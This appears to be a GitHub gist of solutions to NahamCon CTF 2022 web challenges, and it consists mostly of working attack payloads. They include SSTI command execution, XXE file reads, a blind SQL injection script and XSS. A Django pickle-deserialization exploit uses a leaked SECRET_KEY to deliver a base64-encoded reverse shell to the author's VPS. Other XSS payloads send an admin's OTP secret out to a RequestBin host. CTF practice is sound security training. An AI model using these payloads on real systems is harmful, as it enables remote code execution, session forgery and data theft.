Challenge Deafcon (SSTI and Normalize)
name=taidh&email=taidh@cc{{joiner.__init__.__globals__.os.popen('cat${IFS}flag*').read()}}
NahamCon CTF 2022 - Solution
Challenge EXtravagant (XXE Injection)
- Upload file taidh.xml
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY payload SYSTEM 'file:///var/www/flag.txt'>]><root>&payload;</root>- Request to
HOST:PORT/XML?file=taidh.xml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # SQLite Injection (Order by) | |
| import requests | |
| import string | |
| import re | |
| URL = "http://challenge.nahamcon.com:31423" # Change URL | |
| res_regex = '<td style="width:20%">(.*?)</td>' | |
| flag = '' | |
| for i in range(1,500): | |
| for char in string.ascii_letters + '_{}': | |
| print(char,end='\r') | |
| data = {'search':'a','order':f'(case when (substr((select flag from flag),{i},1)="{char}") then atomic_number else name end)'} | |
| r = requests.post(URL, data=data) | |
| res = re.findall(res_regex,r.text)[0] | |
| if "12" in res: | |
| flag += char | |
| print(flag) | |
| break |
Challenge Hacker Ts (XSS)
<h1 id=taidh></h1>
<script>
var a = new XMLHttpRequest();
a.open("GET","http://localhost:5000/admin",false);
a.send();
document.getElementById('taidh').innerHTML = a.responseText;
</script>Challenge Personnel (Regex Injection)
POST / HTTP/1.1
Host: challenge.nahamcon.com:30349
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
Connection: close
setting=0&name=|.*|
Challenge Poller (Picker Serialize and Reveal the SECRET_KEY - Django)
-
Find SECRET_KEY in source github
-
Picker Serialize Recommended to use Django 4.0.4
import os
import django.core.signing
import pickle
import base64
import django.contrib.sessions.serializers as serializers
SECRET_KEY = '77m6p#v&(wk_s2+n5na-bqe!m)^zu)9typ#0c&@qd%8o6!'
salt = 'django.contrib.sessions.backends.signed_cookies'
class Command(object):
def __reduce__(self):
return (os.system,("echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiW0ldIiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigiL2Jpbi9zaCIpJwo= | base64 -d | sh",)) # Decode string base64 and change to your IP vps
my_cookie= django.core.signing.dumps(Command(),key=SECRET_KEY,salt= salt, serializer=serializers.PickleSerializer,compress=True)
print(my_cookie)nc -lvnp 4444in your VPS- Change above cookie to
sessionid
Challenge Two For One (Leak OTP and XSS)
There are xss in feedback
- Leak OTP admin
<script>fetch('/reset2fa',{method: 'POST'}).then(r=>r.json()).then(r=>{fetch('http://[RequestBin]?cc='+r.url);});</script>Then login at Google Authenticator with username admin and secret receive
- Show secret of admin
<script>
fetch('/show_secret', {
method: 'POST',
headers: {
'Accept': 'application/json',
'Content-Type': 'application/json'
},
body: JSON.stringify({otp: 680661, secretId: 1}) //change OTP
}).then(r=>r.text()).then(r=>{fetch('http://[RequestBin]?cc='+btoa(r));});
</script>
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment